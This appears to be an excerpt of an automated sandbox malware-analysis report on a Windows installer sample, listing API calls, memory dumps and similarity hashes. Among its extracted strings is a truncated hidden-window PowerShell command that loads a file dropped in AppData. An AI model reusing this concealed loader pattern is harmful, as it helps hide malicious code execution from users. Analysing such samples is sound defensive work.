        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: Open
        • String ID:
        • API String ID: 71445658-0
        • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
        • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
        • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
        • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
        APIs
        • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,004033FF,0040A230,0040A230,00403303,00414ED0,00004000,?,00000000,004031AD), ref: 00405E7E
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileRead
        • String ID:
        • API String ID: 2738559852-0
        • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
        • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
        • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
        • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
        APIs
        • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00411EEE,0040CED0,00403383,0040CED0,00411EEE,00414ED0,00004000,?,00000000,004031AD,00000004), ref: 00405EAD
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
        • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
        • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
        • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
        APIs
        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend
        • String ID:
        • API String ID: 3850602802-0
        • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
        • Instruction ID: 8a3813f545c22c4fb684de807d70b5cf20617c54f99984af9f55df869fa0abe2
        • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
        • Instruction Fuzzy Hash: B2C09B71740700BBDA20DF649D45F5777547764701F1488797741F60E0C674D410D62C
        APIs
        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: FilePointer
        • String ID:
        • API String ID: 973152223-0
        • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
        • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
        • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
        • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
        APIs
        • SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend
        • String ID:
        • API String ID: 3850602802-0
        • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
        • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
        • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
        • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
        APIs
        • KiUserCallbackDispatcher.NTDLL(?,004040D0), ref: 00404302
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CallbackDispatcherUser
        • String ID:
        • API String ID: 2492992576-0
        • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
        • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
        • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
        • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59
        APIs
        • GetDlgItem.USER32(?,000003F9), ref: 00404D05
        • GetDlgItem.USER32(?,00000408), ref: 00404D10
        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
        • LoadBitmapW.USER32(0000006E), ref: 00404D6D
        • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
        • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
        • DeleteObject.GDI32(00000000), ref: 00404DE3
        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
        • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
        • ShowWindow.USER32(?,00000005), ref: 00404F3D
        • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
        • ImageList_Destroy.COMCTL32(?), ref: 0040510D
        • GlobalFree.KERNEL32(?), ref: 0040511D
        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
        • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
        • InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
        • ShowWindow.USER32(?,00000000), ref: 004052BC
        • GetDlgItem.USER32(?,000003FE), ref: 004052C7
        • ShowWindow.USER32(00000000), ref: 004052CE
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
        • String ID: $M$N
        • API String ID: 1638840714-813528018
        • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
        • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
        • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
        • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
        APIs
        • GetDlgItem.USER32(?,000003FB), ref: 004047C0
        • SetWindowTextW.USER32(00000000,?), ref: 004047EA
        • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
        • CoTaskMemFree.OLE32(00000000), ref: 004048A6
        • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004048D8
        • lstrcatW.KERNEL32(?,004281E0), ref: 004048E4
        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
          • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
          • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
          • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
          • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
          • Part of subcall function 004064A6: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
        • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
          • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
          • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
          • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
        Strings
        • (7B, xrefs: 0040486E
        • powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl, xrefs: 0040478A
        • A, xrefs: 00404894
        • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 004048C1
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2060335501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060509869.0000000000408000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000040A000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000418000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000422000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000425000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000427000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000042B000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.0000000000433000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2060623853.000000000044D000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2061066506.0000000000450000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_Ej86aa7Ki7.jbxd
        Similarity
        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
        • String ID: (7B$A$C:\Users\user\AppData\Roaming\afdragsordning$powershell.exe -windowstyle hidden "$Fysioterapiens=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Taarnvognenes.Ufe';$Bl
        • API String ID: 2624150263-3228406189
        APIs
        • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
        Strings
        • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 004021C3
        Similarity
        • API ID: CreateInstance
        • String ID: C:\Users\user\AppData\Roaming\afdragsordning
        • API String ID: 542301482-4024115843
        APIs
        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404511
        • GetDlgItem.USER32(?,000003E8), ref: 00404525
        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404542
        • GetSysColor.USER32(?), ref: 00404553
        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
        • lstrlenW.KERNEL32(?), ref: 00404574
        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
        • GetDlgItem.USER32(?,0000040A), ref: 004045EF
        • SendMessageW.USER32(00000000), ref: 004045F6
        • GetDlgItem.USER32(?,000003E8), ref: 00404621
        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
        • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
        • SetCursor.USER32(00000000), ref: 00404675
        • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,00000001), ref: 0040468A
        • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
        • SetCursor.USER32(00000000), ref: 00404699
        • SendMessageW.USER32(00000111,00000001,00000000), ref: 004046C8
        • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
        Similarity
        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
        • String ID: N$open$C@
        • API String ID: 3615053054-346628716
        APIs
        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
        • BeginPaint.USER32(?,?), ref: 00401047
        • GetClientRect.USER32(?,?), ref: 0040105B
        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
        • DeleteObject.GDI32(?), ref: 004010ED
        • CreateFontIndirectW.GDI32(?), ref: 00401105
        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
        • SelectObject.GDI32(00000000,?), ref: 00401140
        • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
        • SelectObject.GDI32(00000000,00000000), ref: 00401160
        • DeleteObject.GDI32(?), ref: 00401165
        • EndPaint.USER32(?,?), ref: 0040116E
        Similarity
        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
        • String ID: F
        • API String ID: 941294808-1304234792
        APIs
        • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,004060D4,?,?), ref: 00405F50
        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,004060D4,?,?), ref: 00405F74
        • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
          • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
          • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
        • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
        • wsprintfA.USER32 ref: 00405FB8
        • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
        • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
        • GlobalFree.KERNEL32(00000000), ref: 004060A1
        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
          • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405DEB
          • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
        Similarity
        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
        • String ID: %ls=%ls$NUL$[Rename]
        • API String ID: 222337774-899692902
        APIs
        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
        • CharNextW.USER32(?,?,?,00000000), ref: 00406518
        • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
        • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Ej86aa7Ki7.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
        Strings
        • "C:\Users\user\Desktop\Ej86aa7Ki7.exe", xrefs: 004064A6
        • C:\Users\user\AppData\Local\Temp\, xrefs: 004064A7
        • *?|<>/":, xrefs: 004064F8
        Similarity
        • API ID: Char$Next$Prev
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
        • API String ID: 589700163-2082602037
        APIs
        • GetWindowLongW.USER32(?,000000EB), ref: 0040435A
        • GetSysColor.USER32(00000000), ref: 00404376
        • SetTextColor.GDI32(?,00000000), ref: 00404382
        • SetBkMode.GDI32(?,?), ref: 0040438E
        • GetSysColor.USER32(?), ref: 004043A1
        • SetBkColor.GDI32(?,?), ref: 004043B1
        • DeleteObject.GDI32(?), ref: 004043CB
        • CreateBrushIndirect.GDI32(?), ref: 004043D5
        Similarity
        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
        • String ID:
        • API String ID: 2320649405-0
        APIs
        • ReadFile.KERNEL32(?,?,?,?), ref: 004026CC
        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740
          • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE
        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC
        Similarity
        • API ID: File$Pointer$ByteCharMultiWide$Read
        • String ID: 9
        • API String ID: 163830602-2366072709
        APIs
        • DestroyWindow.USER32(00000000,00000000), ref: 00402E4E
        • GetTickCount.KERNEL32 ref: 00402E6C
        • wsprintfW.USER32 ref: 00402E9A
          • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
          • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
